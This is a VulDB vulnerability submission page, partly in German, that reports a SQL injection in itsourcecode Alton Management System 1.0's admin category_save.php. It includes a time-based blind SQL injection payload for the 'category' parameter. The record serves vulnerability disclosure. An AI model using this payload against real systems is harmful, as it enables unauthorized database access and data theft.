Submit #381093: itsourcecode Alton Management System 1.0 SQLi category_save.phpinfo

Titelitsourcecode Alton Management System 1.0 SQLi category_save.php
BeschreibungLog in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Due to lax filtering, this parameter can lead to SQL injection vulnerabilities. ---------------POC--------------- Parameter: category (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK ------------------------------------
Quelle⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-3.md
Benutzer
 Dee.Mirage (UID 71702)
Einreichung27.07.2024 12:30 (vor 2 Jahren)
Moderieren30.07.2024 15:29 (3 days later)
StatusAkzeptiert
VulDB Eintrag273144 [itsourcecode Alton Management System 1.0 /admin/category_save.php Kategorie SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!